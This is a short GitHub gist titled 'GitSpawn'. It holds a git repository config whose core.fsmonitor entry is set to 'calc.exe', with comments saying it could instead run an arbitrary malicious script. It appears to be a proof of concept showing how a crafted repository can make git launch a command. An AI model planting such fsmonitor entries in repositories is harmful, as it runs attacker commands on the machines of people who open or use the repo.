Created
September 8, 2026 04:10
-
-
Save up1/18b59871fde7ee28d9e819cf3db3681b to your computer and use it in GitHub Desktop.
GitSpawn
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [core] | |
| repositoryformatversion = 0 | |
| filemode = true | |
| bare = false | |
| logallrefupdates = true | |
| # The fsmonitor configuration points to an arbitrary payload/command | |
| fsmonitor = "calc.exe" | |
| # On Unix-like systems, this could execute an arbitrary malicious script: | |
| # fsmonitor = "/path/to/malicious_script.sh" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment